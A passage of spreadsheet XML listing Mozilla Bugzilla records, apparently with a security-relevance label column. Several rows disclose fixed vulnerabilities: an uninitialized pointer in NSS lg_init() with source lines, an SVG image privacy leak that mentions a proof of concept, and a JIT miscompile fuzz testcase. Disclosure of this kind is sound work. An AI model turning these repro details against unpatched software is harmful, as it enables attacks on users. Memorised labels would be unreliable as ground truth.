* We should add another option called "Firefox problem".</t>
        </is>
      </c>
      <c r="X3375" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3376">
      <c r="A3376" t="n">
        <v>1454072</v>
      </c>
      <c r="B3376" t="inlineStr">
        <is>
          <t>2018-04-13 13:47:41 -0700</t>
        </is>
      </c>
      <c r="C3376" t="inlineStr">
        <is>
          <t>Use of uninitialized pointer in lg_init()</t>
        </is>
      </c>
      <c r="D3376" t="inlineStr">
        <is>
          <t>2024-05-30 09:45:14 -0700</t>
        </is>
      </c>
      <c r="E3376" t="n">
        <v>1</v>
      </c>
      <c r="F3376" t="n">
        <v>1</v>
      </c>
      <c r="G3376" t="n">
        <v>3</v>
      </c>
      <c r="H3376" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3376" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3376" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3376" t="inlineStr">
        <is>
          <t>3.34.1</t>
        </is>
      </c>
      <c r="L3376" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3376" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3376" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3376" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3376" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main102+]</t>
        </is>
      </c>
      <c r="Q3376" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3376" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3376" t="inlineStr">
        <is>
          <t>3.79</t>
        </is>
      </c>
      <c r="T3376" t="n">
        <v>0</v>
      </c>
      <c r="U3376" t="n">
        <v>0</v>
      </c>
      <c r="V3376" t="n">
        <v>5</v>
      </c>
      <c r="W3376" t="inlineStr">
        <is>
          <t>lg_init() (security\nss\lib\softoken\legacydb\lginit.c) can use an uninitialized pointer on error. The bug is that line 504 does not initialize the block pointed to by |lgdb_p|. If line 511 fails (as with an OOM), causing lines 512-14 to transfer control to lines 544 et seq, line 552 will read the uninitialized pointer |lgdb-&gt;hashtable|, and if it is nonzero (likely), line 553 will attempt to destroy it, in the process reading and writing hyperspace:
491: CK_RV
492: lg_init(SDB **pSdb, int flags, NSSLOWCERTCertDBHandle *certdbPtr,
493:         NSSLOWKEYDBHandle *keydbPtr)
494: {
495:     SDB *sdb = NULL;
496:     LGPrivate *lgdb_p = NULL;
497:     CK_RV error = CKR_HOST_MEMORY;
498: 
499:     *pSdb = NULL;
500:     sdb = (SDB *)PORT_Alloc(sizeof(SDB));
501:     if (sdb == NULL) {
502:         goto loser;
503:     }
504:     lgdb_p = (LGPrivate *)PORT_Alloc(sizeof(LGPrivate));
505:     if (lgdb_p == NULL) {
506:         goto loser;
507:     }
508:     /* invariant fields */
509:     lgdb_p-&gt;certDB = certdbPtr;
510:     lgdb_p-&gt;keyDB = keydbPtr;
511:     lgdb_p-&gt;dbLock = PR_NewLock();
512:     if (lgdb_p-&gt;dbLock == NULL) {
513:         goto loser;
514:     }
515:     lgdb_p-&gt;hashTable = PL_NewHashTable(64, lg_HashNumber, PL_CompareValues,
516:                                         SECITEM_HashCompare, NULL, 0);
517:     if (lgdb_p-&gt;hashTable == NULL) {
518:         goto loser;
519:     }
520:
...
541:     *pSdb = sdb;
542:     return CKR_OK;
543: 
544: loser:
545:     if (sdb) {
546:         PORT_Free(sdb);
547:     }
548:     if (lgdb_p) {
549:         if (lgdb_p-&gt;dbLock) {
550:             PR_DestroyLock(lgdb_p-&gt;dbLock);
551:         }
552:         if (lgdb_p-&gt;hashTable) {
553:             PL_HashTableDestroy(lgdb_p-&gt;hashTable);
554:         }
555:         PORT_Free(lgdb_p);
556:     }
557:     return error;
558: }
FF typically poisons memory blocks with 0xe4 or 0xe5, but I don't know whether poisoning is guaranteed in all environments that NSS supports.</t>
        </is>
      </c>
      <c r="X3376" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3377">
      <c r="A3377" t="n">
        <v>1613607</v>
      </c>
      <c r="B3377" t="inlineStr">
        <is>
          <t>2020-02-06 01:46:55 -0800</t>
        </is>
      </c>
      <c r="C3377" t="inlineStr">
        <is>
          <t>Remove "trigger all talos jobs" from push action menu</t>
        </is>
      </c>
      <c r="D3377" t="inlineStr">
        <is>
          <t>2021-12-05 14:50:08 -0800</t>
        </is>
      </c>
      <c r="E3377" t="n">
        <v>1</v>
      </c>
      <c r="F3377" t="n">
        <v>1</v>
      </c>
      <c r="G3377" t="n">
        <v>7</v>
      </c>
      <c r="H3377" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3377" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3377" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3377" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3377" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3377" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3377" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3377" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3377" t="inlineStr"/>
      <c r="Q3377" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3377" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3377" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3377" t="n">
        <v>1</v>
      </c>
      <c r="U3377" t="n">
        <v>0</v>
      </c>
      <c r="V3377" t="n">
        <v>14</v>
      </c>
      <c r="W3377" t="inlineStr">
        <is>
          <t>We have a shortcut from years ago that lives in treeherder for mass triggering all perf tests.  This is outdated as it is talos only where the current reality is raptor.  As a new developer, or one who is new to perf validation, it is fairly easy to discover the "trigger all talos jobs" in the action menu of a push- but that is most likely not what is needed.
I would like to determine:
1) should we have a quick run all perf
2) how visible should we make tools
3) how to keep this tool to be relevant (changing tests, harnesses)
I think for 1, that is a question for sheriffs.  Do they use this?  Do they recommend developers use this?  Do they see people using this?
for 2- I would prefer to rotate towards push health and recommend the right number of retriggers as well as tests.  That is a longer term view, can we do shorter term now?
for 3- even if this is in push health, it will be outdated, I think for the perf tooling team they should revisit sheriffing tools as well as developer docs/tools on a regular basis
could we get metrics on on frequently this is used?</t>
        </is>
      </c>
      <c r="X3377" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3378">
      <c r="A3378" t="n">
        <v>1319122</v>
      </c>
      <c r="B3378" t="inlineStr">
        <is>
          <t>2016-11-21 09:25:55 -0800</t>
        </is>
      </c>
      <c r="C3378" t="inlineStr">
        <is>
          <t>SVG-as-an-image sends requests for external files, if they're included in a data URI</t>
        </is>
      </c>
      <c r="D3378" t="inlineStr">
        <is>
          <t>2024-05-30 09:23:21 -0700</t>
        </is>
      </c>
      <c r="E3378" t="n">
        <v>1</v>
      </c>
      <c r="F3378" t="n">
        <v>1</v>
      </c>
      <c r="G3378" t="n">
        <v>3</v>
      </c>
      <c r="H3378" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3378" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3378" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K3378" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L3378" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3378" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3378" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3378" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3378" t="inlineStr">
        <is>
          <t>[adv-main50.1+][adv-esr45.6+]</t>
        </is>
      </c>
      <c r="Q3378" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3378" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3378" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T3378" t="n">
        <v>1</v>
      </c>
      <c r="U3378" t="n">
        <v>0</v>
      </c>
      <c r="V3378" t="n">
        <v>37</v>
      </c>
      <c r="W3378" t="inlineStr">
        <is>
          <t>Created attachment 8812820
svg_leak_poc.zip
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Steps to reproduce:
Tested: 
Windows 8.1 - Firefox Nightly 53.0a1
Windows 7 - 50.0
SVG images loaded via an img tag are restricted on the support for external resources.
See Bug https://bugzilla.mozilla.org/show_bug.cgi?id=628747
This restriction fails as soon as the SVG file loads a second SVG file via the fill attribute.
Note that it could be that other SVG attributes could be used as well, I haven't checked all of them so far. 
As soon as the second SVG is parsed, Firefox fetches different remote resources. 
The PoC will load different resources from example.com to proof that.
Additionally the data: protocol was used inside the fill attribute, to have the PoC in one place.
Actual results:
After the SVG was rendered remote files are fetched.
Expected results:
Taking into consideration that developers assume that images can not trigger different connections to external resources, this could cause privacy issues.</t>
        </is>
      </c>
      <c r="X3378" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3379">
      <c r="A3379" t="n">
        <v>1311462</v>
      </c>
      <c r="B3379" t="inlineStr">
        <is>
          <t>2016-10-19 11:04:17 -0700</t>
        </is>
      </c>
      <c r="C3379" t="inlineStr">
        <is>
          <t>Symbol dumping failing for XUL on Firefox Beta 8 builds</t>
        </is>
      </c>
      <c r="D3379" t="inlineStr">
        <is>
          <t>2018-03-02 12:12:20 -0800</t>
        </is>
      </c>
      <c r="E3379" t="n">
        <v>1</v>
      </c>
      <c r="F3379" t="n">
        <v>1</v>
      </c>
      <c r="G3379" t="n">
        <v>7</v>
      </c>
      <c r="H3379" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3379" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J3379" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3379" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L3379" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3379" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3379" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3379" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3379" t="inlineStr"/>
      <c r="Q3379" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3379" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3379" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T3379" t="n">
        <v>1</v>
      </c>
      <c r="U3379" t="n">
        <v>0</v>
      </c>
      <c r="V3379" t="n">
        <v>25</v>
      </c>
      <c r="W3379" t="inlineStr">
        <is>
          <t>[Tracking Requested - why for this release]: Need symbols for Mac during the run up to final release
+++ This bug was initially created as a clone of Bug #1301751 +++
Beta 8 Mac builds seem to be suffering from the same issue seen in the cloned bug. See 
http://bit.ly/2eFhoe9</t>
        </is>
      </c>
      <c r="X3379" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3380">
      <c r="A3380" t="n">
        <v>117153</v>
      </c>
      <c r="B3380" t="inlineStr">
        <is>
          <t>2001-12-27 19:11:56 -0800</t>
        </is>
      </c>
      <c r="C3380" t="inlineStr">
        <is>
          <t>build crashes on startup with PAC enabled</t>
        </is>
      </c>
      <c r="D3380" t="inlineStr">
        <is>
          <t>2020-12-09 12:56:52 -0800</t>
        </is>
      </c>
      <c r="E3380" t="n">
        <v>1</v>
      </c>
      <c r="F3380" t="n">
        <v>1</v>
      </c>
      <c r="G3380" t="n">
        <v>3</v>
      </c>
      <c r="H3380" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3380" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3380" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K3380" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3380" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3380" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3380" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3380" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3380" t="inlineStr"/>
      <c r="Q3380" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3380" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3380" t="inlineStr">
        <is>
          <t>mozilla0.9.8</t>
        </is>
      </c>
      <c r="T3380" t="n">
        <v>1</v>
      </c>
      <c r="U3380" t="n">
        <v>0</v>
      </c>
      <c r="V3380" t="n">
        <v>25</v>
      </c>
      <c r="W3380" t="inlineStr">
        <is>
          <t>This affects 0.9.7 builds as well as builds from the tip at least as of Dec 27,
2001.
If I have my pac file enabled, I will crash often (half the time) on startup. 
Here's a stack trace of both the UI thread (thread 1) and thread 6 which is
accessing the PAC file.
(gdb) thread 1
[Switching to thread 1 (Thread 1024 (LWP 26972))]#0  0x405eeb85 in __sigsuspend
    (set=0xbfffe250) at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
45
../sysdeps/unix/sysv/linux/sigsuspend.c: No such file or directory.
	in ../sysdeps/unix/sysv/linux/sigsuspend.c
Current language:  auto; currently c
(gdb) where
#0  0x405eeb85 in __sigsuspend (set=0xbfffe250)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x4030c1c9 in __pthread_wait_for_restart_signal (self=0x40314f40)
    at pthread.c:969
#2  0x4030df09 in __pthread_alt_lock (lock=0x406f4fa0, self=0x0)
    at restart.h:34
#3  0x4030ad16 in __pthread_mutex_lock (mutex=0x406f4f90) at mutex.c:120
#4  0x40640fe8 in __libc_free (mem=0x8188c28) at malloc.c:3152
#5  0x401ad95e in PL_DHashFreeTable (table=0x402a8ca0, ptr=0x8188c28)
    at pldhash.c:69
#6  0x401ae30b in ChangeTable (table=0x402a8ca0, deltaLog2=1) at pldhash.c:468
#7  0x401ae411 in PL_DHashTableOperate (table=0x402a8ca0, key=0xbfffe524, 
    op=PL_DHASH_ADD) at pldhash.c:513
#8  0x401afd34 in GetAtomHashEntry (aString=@0xbfffe510) at nsAtomTable.cpp:276
#9  0x401afd73 in NS_NewAtom (aString=@0xbfffe510) at nsAtomTable.cpp:284
#10 0x4167f033 in nsCSSSelector::SetTag (this=0xbfffe650, aTag=@0xbfffe510)
    at nsCSSStyleRule.cpp:470
#11 0x41671eac in CSSParserImpl::ParseTypeOrUniversalSelector (
    this=0x426b7638, aDataMask=@0xbfffe5f0, aSelector=@0xbfffe650, 
    aParsingStatus=@0xbfffe5ec, aErrorCode=@0xbfffe740, aIsNegated=0)
    at nsCSSParser.cpp:1882
#12 0x416730b7 in CSSParserImpl::ParseSelector (this=0x426b7638, 
    aErrorCode=@0xbfffe740, aSelector=@0xbfffe650) at nsCSSParser.cpp:2347
#13 0x4167148b in CSSParserImpl::ParseSelectorGroup (this=0x426b7638, 
    aErrorCode=@0xbfffe740, aList=@0xbfffe6c0) at nsCSSParser.cpp:1598
#14 0x41670fd4 in CSSParserImpl::ParseSelectorList (this=0x426b7638, 
    aErrorCode=@0xbfffe740, aListHead=@0xbfffe700) at nsCSSParser.cpp:1498
#15 0x41670dd9 in CSSParserImpl::ParseRuleSet (this=0x426b7638, 
    aErrorCode=@0xbfffe740, 
    aAppendFunc=0x4166df5c &lt;AppendRuleToSheet(nsICSSRule *, void *)&gt;, 
    aData=0x426b7638) at nsCSSParser.cpp:1438
#16 0x4166eb90 in CSSParserImpl::Parse (this=0x426b7638, aInput=0x426b79a8, 
    aInputURL=0x426c1818, aResult=@0xbfffe8a4) at nsCSSParser.cpp:614
#17 0x4166acd5 in CSSLoaderImpl::ParseSheet (this=0x426b69e8, aIn=0x426b79a8, 
    aLoadData=0x426b7920, aCompleted=@0xbfffe8a8, aSheet=@0xbfffe8a4)
    at nsCSSLoader.cpp:943
#18 0x4166bce6 in CSSLoaderImpl::LoadSheet (this=0x426b69e8, aKey=@0xbfffe940, 
    aData=0x426b7920) at nsCSSLoader.cpp:1272
#19 0x4166cda7 in CSSLoaderImpl::LoadChildSheet (this=0x426b69e8, 
    aParentSheet=0x426b6cf0, aURL=0x426c1818, aMedia=@0xbfffea20, 
    aDefaultNameSpaceID=-1, aIndex=2, aParentRule=0x426b78ac)
    at nsCSSLoader.cpp:1573
#20 0x41670104 in CSSParserImpl::ProcessImport (this=0x426b6e08, 
    aErrorCode=@0xbfffebc0, aURLSpec=@0xbfffeac0, aMedia=@0xbfffea20, 
    aAppendFunc=0x4166df5c &lt;AppendRuleToSheet(nsICSSRule *, void *)&gt;, 
    aData=0x426b6e08) at nsCSSParser.cpp:1163
#21 0x4166fe88 in CSSParserImpl::ParseImportRule (this=0x426b6e08, 
    aErrorCode=@0xbfffebc0, 
    aAppendFunc=0x4166df5c &lt;AppendRuleToSheet(nsICSSRule *, void *)&gt;, 
    aData=0x426b6e08) at nsCSSParser.cpp:1122
#22 0x4166f8e2 in CSSParserImpl::ParseAtRule (this=0x426b6e08, 
    aErrorCode=@0xbfffebc0, 
    aAppendFunc=0x4166df5c &lt;AppendRuleToSheet(nsICSSRule *, void *)&gt;, 
    aData=0x426b6e08) at nsCSSParser.cpp:981
#23 0x4166eb66 in CSSParserImpl::Parse (this=0x426b6e08, aInput=0x426b72a8, 
    aInputURL=0x426b6900, aResult=@0x419730ac) at nsCSSParser.cpp:610
#24 0x4166acd5 in CSSLoaderImpl::ParseSheet (this=0x426b69e8, aIn=0x426b72a8, 
    aLoadData=0x426b6c10, aCompleted=@0xbfffede8, aSheet=@0x419730ac)
    at nsCSSLoader.cpp:943
#25 0x4166cfa2 in CSSLoaderImpl::LoadAgentSheet (this=0x426b69e8, 
    aURL=0x426b6900, aSheet=@0x419730ac, aCompleted=@0xbfffede8, aObserver=0x0)
    at nsCSSLoader.cpp:1612
#26 0x415a3534 in nsContentDLF::CreateInstance (this=0x426b68e8, 
    aCommand=0x412efe7a "view", aChannel=0x8198140, aLoadGroup=0x8160c00, 
    aContentType=0xbffff194 "text/html", aContainer=0x8160674, aExtraInfo=0x0, 
    aDocListener=0xbffff240, aDocViewer=0xbffff050) at nsContentDLF.cpp:187
#27 0x412bae4f in nsDocShell::NewContentViewerObj (this=0x8160650, 
    aContentType=0xbffff194 "text/html", request=0x8198140, 
    aLoadGroup=0x8160c00, aContentHandler=0xbffff240, aViewer=0xbffff050)
    at nsDocShell.cpp:3642
#28 0x412ba7ae in nsDocShell::CreateContentViewer (this=0x8160650, 
    aContentType=0xbffff194 "text/html", request=0x8198140, 
    aContentHandler=0xbffff240) at nsDocShell.cpp:3533
#29 0x412cedda in nsDSURIContentListener::DoContent (this=0x8160898, 
    aContentType=0xbffff194 "text/html", aIsContentPreferred=0, 
    request=0x8198140, aContentHandler=0xbffff240, aAbortProcess=0xbffff1e0)
    at nsDSURIContentListener.cpp:107
#30 0x411ed389 in nsDocumentOpenInfo::DispatchContent (this=0x8198030, 
    request=0x8198140, aCtxt=0x0) at nsURILoader.cpp:355
#31 0x411ecbb1 in nsDocumentOpenInfo::OnStartRequest (this=0x8198030, 
    request=0x8198140, aCtxt=0x0) at nsURILoader.cpp:226
#32 0x40b55764 in nsStreamIOChannel::OnStartRequest (this=0x8198140, 
    request=0x81982f4, context=0x0) at nsInputStreamChannel.cpp:470
#33 0x40be2734 in nsOnStartRequestEvent::HandleEvent (this=0x8193bf8)
    at nsRequestObserverProxy.cpp:161
#34 0x40b601c8 in nsARequestObserverEvent::HandlePLEvent (plev=0x8193bf8)
    at nsRequestObserverProxy.cpp:115
#35 0x4020d570 in PL_HandleEvent (self=0x8193bf8) at plevent.c:590
#36 0x4020dce1 in PL_ProcessEventsBeforeID (aSelf=0x80d1f20, aID=153)
    at plevent.c:1256
#37 0x4097f1b5 in processQueue (aElement=0x80d1f20, aData=0x99)
    at nsAppShell.cpp:464
#38 0x401ca06c in nsVoidArray::EnumerateForwards (this=0x80a8770, 
    aFunc=0x4097f188 &lt;processQueue(void *, void *)&gt;, aData=0x99)
    at nsVoidArray.cpp:660
#39 0x4097f1f8 in nsAppShell::ProcessBeforeID (aID=153) at nsAppShell.cpp:472
#40 0x40987fd2 in handle_gdk_event (event=0x41e57828, data=0x0)
    at nsGtkEventHandler.cpp:908
#41 0x40461d7f in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#42 0x40495773 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#43 0x40495d39 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#44 0x40495eec in g_main_run () from /usr/lib/libglib-1.2.so.0
#45 0x403b0333 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#46 0x4097ee69 in nsAppShell::Run (this=0x80de088) at nsAppShell.cpp:349
#47 0x4091b6a5 in nsAppShellService::Run (this=0x80dd758)
    at nsAppShellService.cpp:302
#48 0x0805ab75 in main1 (argc=1, argv=0xbffff794, nativeApp=0x0)
    at nsAppRunner.cpp:1264
#49 0x0805b81b in main (argc=1, argv=0xbffff794) at nsAppRunner.cpp:1594
#50 0x405dc627 in __libc_start_main (main=0x805b614 &lt;main&gt;, argc=1, 
    ubp_av=0xbffff794, init=0x8055178 &lt;_init&gt;, fini=0x8064d64 &lt;_fini&gt;, 
    rtld_fini=0x4000dcc4 &lt;_dl_fini&gt;, stack_end=0xbffff78c)
    at ../sysdeps/generic/libc-start.c:129
(gdb) thread 6
[Switching to thread 6 (Thread 4101 (LWP 26978))]#0  0x4067b071 in
__libc_nanosleep () from /lib/i686/libc.so.6
(gdb) where
#0  0x4067b071 in __libc_nanosleep () from /lib/i686/libc.so.6
#1  0x4067aef1 in __sleep (seconds=300)
    at ../sysdeps/unix/sysv/linux/sleep.c:85
#2  0x0805bf84 in ah_crap_handler (signum=11) at nsSigHandlers.cpp:143
#3  0x4030ca85 in pthread_sighandler (signo=11, ctx=
      {gs = 47, __gsh = 0, fs = 0, __fsh = 0, es = 43, __esh = 0, ds = 43, __dsh
= 0, edi = 0, esi = 134872800, ebp = 1105157892, esp = 1105157804, ebx =
1081042612, edx = 0, ecx = 3, eax = 1081035648, trapno = 14, err = 6, eip =
1080296993, cs = 35, __csh = 0, eflags = 66054, esp_at_signal = 1105157804, ss =
43, __ssh = 0, fpstate = 0x41df5c30, oldmask = 2147483648, cr2 = 12}) at
signals.c:97
#4  &lt;signal handler called&gt;
#5  0x40640621 in chunk_alloc (ar_ptr=0x406f4b80, nb=24) at malloc.c:2878
#6  0x40640428 in __libc_malloc (bytes=16) at malloc.c:2811
#7  0x4072300d in __builtin_new (sz=16) from /usr/lib/libstdc++-libc6.2-2.so.3
#8  0x40247ba2 in nsXPIDLCString::PrepareForUseAsOutParam (this=0x41df60bc)
    at nsXPIDLString.cpp:207
#9  0x08062c94 in nsXPIDLCString::getter_Copies_t::operator char ** (
    this=0x41df5fe4) at ../../dist/include/string/nsXPIDLString.h:320
#10 0x40a108f4 in nsPrefBranch::GetComplexValue (this=0x81189c0, 
    aPrefName=0x41214000 "helpers.private_mime_types_file", aType=@0x8097040, 
    _retval=0x41df614c) at nsPrefBranch.cpp:316
#11 0x40a1e74a in nsPrefService::GetComplexValue (this=0x8118990, 
    aPrefName=0x41214000 "helpers.private_mime_types_file", aType=@0x8097040, 
    aValue=0x41df614c) at nsPrefService.h:57
#12 0x40a0e44e in nsPref::CopyUnicharPref (this=0x8118908, 
    pref=0x41214000 "helpers.private_mime_types_file", _retval=0x809fee8)
    at nsPref.cpp:395
#13 0x411fbaa9 in LookUpTypeAndDescription (aFileExtension=@0x41df623c, 
    aMajorType=@0x41df65fc, aMinorType=@0x41df655c, aDescription=@0x41df64bc)
    at ./unix/nsOSHelperAppService.cpp:277
#14 0x411ff4be in nsOSHelperAppService::GetFromExtension (this=0x81439a8, 
    aFileExt=0x8136a18 "pac", _retval=0x41df67bc)
    at ./unix/nsOSHelperAppService.cpp:1161
#15 0x411f8fab in nsExternalHelperAppService::GetTypeFromExtension (
    this=0x81439a8, aFileExt=0x8136a18 "pac", aContentType=0x426bb540)
    at nsExternalHelperAppService.cpp:1454
#16 0x411f96b4 in nsExternalHelperAppService::GetTypeFromFile (this=0x81439a8, 
    aFile=0x41e5d638, aContentType=0x426bb540)
    at nsExternalHelperAppService.cpp:1589
#17 0x40b4e636 in nsFileIO::Open (this=0x426bb5b0, contentType=0x426bb540, 
    contentLength=0x426bb574) at nsFileStreams.cpp:220
#18 0x40b51a3f in nsFileTransport::Process (this=0x426bb520, progressSink=0x0)
    at nsFileTransport.cpp:671
#19 0x40b518b4 in nsFileTransport::Run (this=0x426bb520)
    at nsFileTransport.cpp:638
#20 0x40213ac9 in nsThreadPoolRunnable::Run (this=0x8193800)
    at nsThread.cpp:904
#21 0x40211475 in nsThread::Main (arg=0x8193818) at nsThread.cpp:120
#22 0x402e5352 in _pt_root (arg=0x8193898) at ptthread.c:214
#23 0x40309c6f in pthread_start_thread (arg=0x41df6be0) at manager.c:284</t>
        </is>
      </c>
      <c r="X3380" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3381">
      <c r="A3381" t="n">
        <v>1027359</v>
      </c>
      <c r="B3381" t="inlineStr">
        <is>
          <t>2014-06-18 15:23:47 -0700</t>
        </is>
      </c>
      <c r="C3381" t="inlineStr">
        <is>
          <t>Differential Testing: Incorrect codegen for mod (%) on ARM sim</t>
        </is>
      </c>
      <c r="D3381" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:08 -0700</t>
        </is>
      </c>
      <c r="E3381" t="n">
        <v>1</v>
      </c>
      <c r="F3381" t="n">
        <v>1</v>
      </c>
      <c r="G3381" t="n">
        <v>3</v>
      </c>
      <c r="H3381" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3381" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3381" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3381" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3381" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3381" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3381" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3381" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3381" t="inlineStr">
        <is>
          <t>[adv-main32+][adv-esr31.1+]</t>
        </is>
      </c>
      <c r="Q3381" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3381" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3381" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T3381" t="n">
        <v>1</v>
      </c>
      <c r="U3381" t="n">
        <v>0</v>
      </c>
      <c r="V3381" t="n">
        <v>39</v>
      </c>
      <c r="W3381" t="inlineStr">
        <is>
          <t>try {
    (function() {
        Array.buildPar(8, function(x) {
            if (x % 511 == 5) {
                n
            }
        })
    })()
    print(this)
} catch (e) {}
$ ./js-dbg-32-dm-ts-armSim-darwin-f78e532e8a10 --fuzzing-safe --ion-offthread-compile=off 1623.js
[object global]
$ ./js-dbg-32-dm-ts-armSim-darwin-f78e532e8a10 --fuzzing-safe --ion-offthread-compile=off --no-baseline 1623.js
(Tested this on 32-bit Mac js dbg threadsafe deterministic ARM-simulator shell off m-c rev f78e532e8a10)
My configure flags are:
LD=ld CROSS_COMPILE=1 CC="clang -Qunused-arguments -msse2 -mfpmath=sse -arch i386" RANLIB=ranlib CXX="clang++ -Qunused-arguments -msse2 -mfpmath=sse -arch i386" AS=$CC AR=ar STRIP="strip -x -S" HOST_CC="clang -Qunused-arguments -msse2 -mfpmath=sse" HOST_CXX="clang++ -Qunused-arguments -msse2 -mfpmath=sse" sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=i386-apple-darwin9.2.0 --enable-macos-target=10.5 --enable-arm-simulator --enable-optimize --enable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --disable-tests --enable-more-deterministic --with-ccache --enable-threadsafe &lt;other NSPR options&gt;</t>
        </is>
      </c>
      <c r="X3381" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3382">
      <c r="A3382" t="n">
        <v>1328762</v>
      </c>
      <c r="B3382" t="inlineStr">
        <is>
          <t>2017-01-04 17:29:50 -0800</t>
        </is>
      </c>
      <c r="C3382" t="inlineStr">
        <is>
          <t>Invalid read @ libGLESv2.dll!rx::Image11::disassociateStorage() | Assertion failure: !err</t>
        </is>
      </c>
      <c r="D3382" t="inlineStr">
        <is>
          <t>2017-11-02 11:50:28 -0700</t>
        </is>
      </c>
      <c r="E3382" t="n">
        <v>1</v>
      </c>
      <c r="F3382" t="n">
        <v>1</v>
